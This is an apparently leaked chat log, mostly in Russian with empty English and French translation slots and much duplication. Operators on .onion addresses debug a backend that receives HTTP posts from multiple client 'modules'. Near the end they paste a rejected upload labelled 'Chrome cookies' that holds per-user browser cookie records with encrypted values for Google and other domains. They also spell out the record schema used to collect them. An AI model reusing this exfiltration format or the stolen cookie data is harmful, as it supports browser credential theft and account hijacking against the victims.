##################################################
Conversation between:
	- hof@q3mcco35auwcstmt.onion
	- ttrr@conference.q3mcco35auwcstmt.onion
534 messages
first: 2021-08-27T10:23:21.385745
last:  2021-12-09T18:55:28.387517
##################################################

2021-08-27T10:23:21.385745  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
	[en] <?>
	[fr] <?>

2021-08-27T10:24:45.407839  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
	[en] <?>
	[fr] <?>

2021-08-27T10:28:23.148995  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
	[en] <?>
	[fr] <?>

2021-08-27T10:29:07.638292  hof@q3mcco35auwcstmt.onion
	[ru] 1
	[en] <?>
	[fr] <?>

2021-08-27T10:29:07.639930  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 1
	[en] <?>
	[fr] <?>

2021-08-27T10:30:05.419498  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] тута
	[en] <?>
	[fr] <?>

2021-08-27T10:30:05.420470  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ждем остальных
	[en] <?>
	[fr] <?>

2021-08-27T10:30:05.421669  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ок
	[en] <?>
	[fr] <?>

2021-08-27T10:30:05.421979  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] хай
	[en] <?>
	[fr] <?>

2021-08-27T10:30:05.422456  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я пароль не ставил на вход в конфу, это приемлемо?
	[en] <?>
	[fr] <?>

2021-08-27T10:30:05.422835  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] это только для зарегистрированных участников
	[en] <?>
	[fr] <?>

2021-08-27T10:30:05.423642  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] других тут не может быть
	[en] <?>
	[fr] <?>

2021-08-27T10:30:05.424482  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] хоф остался
	[en] <?>
	[fr] <?>

2021-08-27T10:30:23.082673  hof@q3mcco35auwcstmt.onion
	[ru] на месте
	[en] <?>
	[fr] <?>

2021-08-27T10:30:23.083909  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] на месте
	[en] <?>
	[fr] <?>

2021-08-27T10:30:28.879939  hof@q3mcco35auwcstmt.onion
	[ru] привет
	[en] <?>
	[fr] <?>

2021-08-27T10:30:28.882112  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] привет
	[en] <?>
	[fr] <?>

2021-08-27T10:34:32.662723  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] короче . проблема в хттп в том . что клиент обрывает коннект раньше, чем передает данные . а именно я грешу на то, что клиент не передает самый последний перевод строки
	[en] <?>
	[fr] <?>

2021-08-27T10:35:13.162821  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] от этого возникает краш на моей стороне и я не могу обработать запрос
	[en] <?>
	[fr] <?>

2021-08-27T10:35:33.428385  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] в http есть три способа получить флаг конца передачи
	[en] <?>
	[fr] <?>

2021-08-27T10:35:41.727352  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 1. Content-Length
	[en] <?>
	[fr] <?>

2021-08-27T10:35:47.131927  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 2. Connection: close
	[en] <?>
	[fr] <?>

2021-08-27T10:36:04.114354  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 3. Content-Encoding: chunked и дальше отслеживается цепочка чанков
	[en] <?>
	[fr] <?>

2021-08-27T10:36:15.503921  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] клиент о котором ты говоришь какой метод использует?
	[en] <?>
	[fr] <?>

2021-08-27T10:36:21.266853  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ты сам какой метод форсируешь на сервере?
	[en] <?>
	[fr] <?>

2021-08-27T10:36:59.319197  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] defender добавь сюда flip и steller
	[en] <?>
	[fr] <?>

2021-08-27T10:37:09.757237  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] да  я никакой не форсирую .есть либа . которая занимается хтпп .. она парсит и разбирает всё .. я лишь её вызываю . 
причем сделано это так .. что сначала работает она .. а потом уже я .. т.о. я не имею доступа напрямую к бинарному потоку данных
	[en] <?>
	[fr] <?>

2021-08-27T10:37:22.169139  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] так вот разберись
	[en] <?>
	[fr] <?>

2021-08-27T10:37:36.835002  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] у клиентов есть причина использовать наиболее простой метод
	[en] <?>
	[fr] <?>

2021-08-27T10:37:55.061608  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] причина есть .если эта причина удовлетворяет спеицификациям хттп ..
	[en] <?>
	[fr] <?>

2021-08-27T10:37:55.378717  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] например им сложно использовать chunked-передачу
	[en] <?>
	[fr] <?>

2021-08-27T10:38:34.866927  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и они скорее всего используют connection: close, то есть сигнал о конце передачи приходит с закрытием сокета
	[en] <?>
	[fr] <?>

2021-08-27T10:38:38.661253  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] если либа падает - это значит что клиент отправляет не то что ожидает эта либа . т.е. не хттп
	[en] <?>
	[fr] <?>

2021-08-27T10:39:02.449365  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ты должен дать требования тем кто пишет клиенты, что эта либа умеет, а чего не умеет
	[en] <?>
	[fr] <?>

2021-08-27T10:39:06.113076  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] либа ожидает на входе (бинарном) данные, но бинарный вход пуст .. вот парсер хттп и ломается
	[en] <?>
	[fr] <?>

2021-08-27T10:39:17.551078  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] она умеет всё
	[en] <?>
	[fr] <?>

2021-08-27T10:39:26.514531  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] как видим не всё
	[en] <?>
	[fr] <?>

2021-08-27T10:39:29.431105  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] это промышленное решение .. и её пользуются очень многие
	[en] <?>
	[fr] <?>

2021-08-27T10:39:40.117749  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] давай на примерах
	[en] <?>
	[fr] <?>

2021-08-27T10:39:46.365048  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] примерах что ?
	[en] <?>
	[fr] <?>

2021-08-27T10:39:51.190207  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] кривой посылки
	[en] <?>
	[fr] <?>

2021-08-27T10:40:03.665991  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] выложи сюда кривую посылку со стороны модуля и скажи что в ней криво
	[en] <?>
	[fr] <?>

2021-08-27T10:40:15.079052  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] еще раз . у меня нет доступа к бинарному потоку ..
	[en] <?>
	[fr] <?>

2021-08-27T10:40:19.334459  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] либа от меня это скрывает
	[en] <?>
	[fr] <?>

2021-08-27T10:40:31.498976  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну HTTP-запрос ты же можешь перехватить?
	[en] <?>
	[fr] <?>

2021-08-27T10:40:39.271374  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я лишь могу по ошибке сказать где сломалось у неё и я вижу что она ожидает данные - но данных нет
	[en] <?>
	[fr] <?>

2021-08-27T10:40:52.889332  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] то есть ты даже не видишь сырые HTTP
	[en] <?>
	[fr] <?>

2021-08-27T10:40:58.710534  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нет
	[en] <?>
	[fr] <?>

2021-08-27T10:41:03.476358  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] только через прокси какой могу
	[en] <?>
	[fr] <?>

2021-08-27T10:41:07.275655  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] поставь mitmproxy
	[en] <?>
	[fr] <?>

2021-08-27T10:41:18.241415  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] как можно отлаживать такую сложную систему наощупь?
	[en] <?>
	[fr] <?>

2021-08-27T10:41:18.452648  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну или логи сделать внутри либы
	[en] <?>
	[fr] <?>

2021-08-27T10:41:22.816112  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] это уже по живому надо
	[en] <?>
	[fr] <?>

2021-08-27T10:41:51.573767  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и флип и стеллер могут предъявить запросы HTTP которые они генерируют, и могут попытаться их исправить в соответствии с твоими указаниями
	[en] <?>
	[fr] <?>

2021-08-27T10:42:05.075423  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] в общем давай я посмотрю тогда бинарный поток . лог сделаю на живом сервере ..
	[en] <?>
	[fr] <?>

2021-08-27T10:42:05.582691  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] тебе лишь надо сказать где ошибка, по твоей версии
	[en] <?>
	[fr] <?>

2021-08-27T10:42:08.861359  hof@q3mcco35auwcstmt.onion
	[ru] может убрать либу? получать данные с сокета?
	[en] <?>
	[fr] <?>

2021-08-27T10:42:08.864968  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] может убрать либу? получать данные с сокета?
	[en] <?>
	[fr] <?>

2021-08-27T10:42:10.027980  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] они тоже могут дать пример потока
	[en] <?>
	[fr] <?>

2021-08-27T10:42:18.328863  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] парсить хттп сам будешь ?
	[en] <?>
	[fr] <?>

2021-08-27T10:42:39.089513  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] @zulas так тут же важно именно сравнить то, что они отправляют, с тем, что ты принимаешь
	[en] <?>
	[fr] <?>

2021-08-27T10:42:43.639580  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] мне щас надо на часок отлучится .. приду - сделаю - посмотрю
	[en] <?>
	[fr] <?>

2021-08-27T10:42:44.193723  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] очень далеко не факт что это одно и то же
	[en] <?>
	[fr] <?>

2021-08-27T10:42:44.436975  hof@q3mcco35auwcstmt.onion
	[ru] ну а какой выход?
	[en] <?>
	[fr] <?>

2021-08-27T10:42:44.439347  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну а какой выход?
	[en] <?>
	[fr] <?>

2021-08-27T10:42:52.131343  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] уже не раз так было
	[en] <?>
	[fr] <?>

2021-08-27T10:42:54.117002  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] выход - разбираться
	[en] <?>
	[fr] <?>

2021-08-27T10:42:55.653199  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] по пути у нас прокладки
	[en] <?>
	[fr] <?>

2021-08-27T10:42:59.529356  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и наши, и чужие
	[en] <?>
	[fr] <?>

2021-08-27T10:43:06.790781  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] они жонглируют заголовками
	[en] <?>
	[fr] <?>

2021-08-27T10:43:16.183234  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] они имеют право перекодировать пакеты
	[en] <?>
	[fr] <?>

2021-08-27T10:43:18.436578  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] отошел
	[en] <?>
	[fr] <?>

2021-08-27T12:29:10.138537  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я на живом сейчас экспериментирую
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.490055  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] мне все равно пока ничего не ясно из файлов
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.491159  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] по-прежнему неясно что это вообще такое - это значение поля Data? я не могу так гадать
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.491658  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] это бинарный поток который мне приходит ..
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.491950  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот с первого байта
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.492482  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] давайте поставлю nginx между клиентом и деро
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.493170  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] поставь
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.493529  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и там может по логам что поймем
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.494016  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и пусть логирует все запросы ..
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.494968  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ок сейчас
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.495564  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] запрос . тело . ответ
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.495806  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я сменю порт у деро, на 8082 будут нджинкс принимать
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.496391  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а, драйвера не добавил сюда
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.496892  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нужен он?
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.497510  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я хз . . я просто пишу сюда что вижу у себя .. а кто нужен я хз
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.498179  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот кто это генерит - тот и нужен ..
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.498700  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нам нужен прилетевший сырой HTTP-запрос как есть
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.499244  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и нужно указание - что в нем криво
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.499965  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [16:24:01] <defender> а, драйвера не добавил сюда
обязательно нужен
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.500662  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] > нам нужен прилетевший сырой HTTP-запрос как есть
я уже показал что мне прилетает .. вот это сырые данные
	[en] <?>
	[fr] <?>

2021-08-27T13:47:25.501180  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] подождем что дефендер скажет
	[en] <?>
	[fr] <?>

2021-08-27T13:49:10.565391  hof@q3mcco35auwcstmt.onion
	[ru] дело в том, что данные в dero посылает не один модуль
	[en] <?>
	[fr] <?>

2021-08-27T13:49:10.568772  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] дело в том, что данные в dero посылает не один модуль
	[en] <?>
	[fr] <?>

2021-08-27T13:49:18.701161  hof@q3mcco35auwcstmt.onion
	[ru] их много
	[en] <?>
	[fr] <?>

2021-08-27T13:49:18.702697  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] их много
	[en] <?>
	[fr] <?>

2021-08-27T13:49:49.133562  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] мы тут с зуласом разбираемся, там странно всё
	[en] <?>
	[fr] <?>

2021-08-27T13:50:18.924244  hof@q3mcco35auwcstmt.onion
	[ru] нужно дорабатывать сущесутвующую, использовать другую либу, но чтобы ничего не падало
	[en] <?>
	[fr] <?>

2021-08-27T13:50:18.928522  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нужно дорабатывать сущесутвующую, использовать другую либу, но чтобы ничего не падало
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.920369  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] давайте поставлю nginx между клиентом и деро
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.921231  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] поставь
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.921755  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и там может по логам что поймем
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.922429  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и пусть логирует все запросы ..
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.922906  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ок сейчас
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.923388  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] запрос . тело . ответ
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.923989  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я сменю порт у деро, на 8082 будут нджинкс принимать
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.924512  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а, драйвера не добавил сюда
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.925129  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нужен он?
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.925942  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я хз . . я просто пишу сюда что вижу у себя .. а кто нужен я хз
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.926748  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот кто это генерит - тот и нужен ..
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.927187  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нам нужен прилетевший сырой HTTP-запрос как есть
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.927559  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и нужно указание - что в нем криво
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.928262  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [16:24:01] <defender> а, драйвера не добавил сюда
обязательно нужен
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.929074  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] > нам нужен прилетевший сырой HTTP-запрос как есть
я уже показал что мне прилетает .. вот это сырые данные
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.929567  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] подождем что дефендер скажет
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.930349  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] дело в том, что данные в dero посылает не один модуль
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.930809  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] их много
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.931531  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] мы тут с зуласом разбираемся, там странно всё
	[en] <?>
	[fr] <?>

2021-08-27T13:51:08.932322  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нужно дорабатывать сущесутвующую, использовать другую либу, но чтобы ничего не падало
	[en] <?>
	[fr] <?>

2021-08-27T13:53:32.719441  hof@q3mcco35auwcstmt.onion
	[ru] и расчитывать на то, что данные будут невалидные
	[en] <?>
	[fr] <?>

2021-08-27T13:53:32.721668  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и расчитывать на то, что данные будут невалидные
	[en] <?>
	[fr] <?>

2021-08-27T13:54:01.210491  hof@q3mcco35auwcstmt.onion
	[ru] их могут специально посылать
	[en] <?>
	[fr] <?>

2021-08-27T13:54:01.215079  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] их могут специально посылать
	[en] <?>
	[fr] <?>

2021-08-27T13:58:05.091199  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну я либу могу модифицировать . просто чтобы если экзепшн в какой-то области .. то в лог не падало и даже ответ можно слать я думаю
	[en] <?>
	[fr] <?>

2021-08-27T13:58:24.130101  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] зулас говорит, что вот эти данные на яндекс диске - это и есть HTTP-запросы со всеми заголовками
	[en] <?>
	[fr] <?>

2021-08-27T13:58:26.262951  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] точнее без них
	[en] <?>
	[fr] <?>

2021-08-27T13:58:29.821177  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а там бинарный поток
	[en] <?>
	[fr] <?>

2021-08-27T13:58:48.997967  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и если он хоть как-то парсится либой бэкенда, то это получается HTTP/2
	[en] <?>
	[fr] <?>

2021-08-27T13:59:02.543417  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и тогда возникает вопрос
- откуда у нас вообще HTTP/2?
	[en] <?>
	[fr] <?>

2021-08-27T13:59:21.605865  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну или QUIC или еще какая бинарная гугловская фигня
	[en] <?>
	[fr] <?>

2021-08-27T13:59:40.082074  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] defender: на прокладках случайно не включена конверсия в HTTP/2 ?
	[en] <?>
	[fr] <?>

2021-08-27T14:04:43.782224  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нет
	[en] <?>
	[fr] <?>

2021-08-27T14:04:57.491318  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] прокладки - роутеры, что приняли то и передали
	[en] <?>
	[fr] <?>

2021-08-27T14:07:15.102970  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] отлучился
	[en] <?>
	[fr] <?>

2021-08-27T14:09:00.008438  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] defender: еще больше нужны сырые http-запросы теперь, в свете данных зуласа
	[en] <?>
	[fr] <?>

2021-08-27T14:09:10.162721  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] если подтвердится что там не HTTP/1.1 то это очень интересно
	[en] <?>
	[fr] <?>

2021-08-27T14:09:16.335183  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нужно подтверждение от тебя
	[en] <?>
	[fr] <?>

2021-08-27T14:13:25.745196  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я делаю нджинкс
	[en] <?>
	[fr] <?>

2021-08-27T14:15:45.066483  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] кстати zulas: ты можешь "хороший" запрос проследить до базы?
	[en] <?>
	[fr] <?>

2021-08-27T14:15:51.255854  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот тот бинарный
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.588796  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот тот бинарный
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.590014  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] что значит послать до базы ?
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.590622  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] @buza
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.591368  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не послать, а проследить
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.592202  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот тебе пришел этот бинарный запрос
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.592982  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и ты говоришь что первый из них нормально парсится и отрабатывает
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.593687  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] раз так, он должен положить в базу данных новую запись
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.594491  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] эту запись можно увидеть?
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.595143  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] там больше нет ничего ..
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.595814  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну т.е. до базы оно не доходит
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.596864  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ни первый ни второй?
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.597738  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] просто в логи ничего не пишется
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.598886  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] да
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.599850  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну так может это и не мы?
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.600847  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] может это боты поисковые и т.п ?
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.602023  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] defender: ты можешь на прокладках отрезать все что не HTTP/1.1 ?
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.602668  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] все HTTP/2 QUIC и прочий модный кал
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.603300  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и запретить доступ к веб-серверу не с прокладки
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.604233  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нет не могу
	[en] <?>
	[fr] <?>

2021-08-27T15:37:14.605268  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] говорю же там все как есть передает
	[en] <?>
	[fr] <?>

2021-08-31T05:53:27.772288  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
	[en] <?>
	[fr] <?>

2021-08-31T08:20:34.376261  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну и ?
	[en] <?>
	[fr] <?>

2021-08-31T08:20:44.478700  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] одному мне больше всез надо ?
	[en] <?>
	[fr] <?>

2021-08-31T08:21:25.224722  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] со вчера вечера что-то писали тут?
	[en] <?>
	[fr] <?>

2021-08-31T08:23:54.170516  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: скинь еще раз кусок того POSTа, который был отвергнут бэком
	[en] <?>
	[fr] <?>

2021-08-31T08:24:17.352878  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] А тут истории нет?
Писал по поводу новых полей в записи куки
	[en] <?>
	[fr] <?>

2021-08-31T08:24:26.072636  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нету истории
	[en] <?>
	[fr] <?>

2021-08-31T08:26:45.196868  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну так на чем остановились?
	[en] <?>
	[fr] <?>

2021-08-31T08:27:19.304871  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я остановился на этом: вот был POST, с виду нормальный, бэк на него 403 сказал. Я попросил зуласа сказать что в нем не так
	[en] <?>
	[fr] <?>

2021-08-31T08:27:38.959280  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а я попросил расширить лог . чтобы логировало ответ
	[en] <?>
	[fr] <?>

2021-08-31T08:27:51.225032  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и размер запроса
	[en] <?>
	[fr] <?>

2021-08-31T08:29:36.045925  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а ты steller ?
	[en] <?>
	[fr] <?>

2021-08-31T08:31:18.951717  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Писал по поводу новых полей в записи куки
	[en] <?>
	[fr] <?>

2021-08-31T08:33:03.543787  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] что именно?
	[en] <?>
	[fr] <?>

2021-08-31T08:33:15.477739  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 403 встречалась раньше ошибка
-----------CJLVIYOINTQPMYSU
Content-Disposition: form-data; name="data"

user|Chrome|.google.com|ANID|	djEw171ep2SDF+UMAcWRRWBcsbp5H34/V0frREuTTKAE2F3BXw3fVVHhgYgcKidlSSPxtTs32WPiqcV/p021G67RLpNXgRDrMqljrJ16Ml1Ckwz2a2URAQ==|1588241125|1651313125|/
user|Chrome|.register.com|__utma|	djEwnpzEp2a3+eOKByaEj0nLtLL7HGvIusWq1obAuia9wTCz3pPEUF6A+gFpZ3LHPf2GSueVelCwgrXMR96kV8MmLcClokQ=|1588241143|1651313173|/

-----------CJLVIYOINTQPMYSU
Content-Disposition: form-data; name="source"

Chrome cookies
-----------CJLVIYOINTQPMYSU--

403
Mismatch parameters count!
	[en] <?>
	[fr] <?>

2021-08-31T08:33:43.142854  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: сколько полей в куки у тебя сейчас?
steller: а у тебя?
	[en] <?>
	[fr] <?>

2021-08-31T08:34:59.536183  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path ]
	[en] <?>
	[fr] <?>

2021-08-31T08:35:00.852836  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот поля
	[en] <?>
	[fr] <?>

2021-08-31T08:35:14.269607  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] разделитель |
	[en] <?>
	[fr] <?>

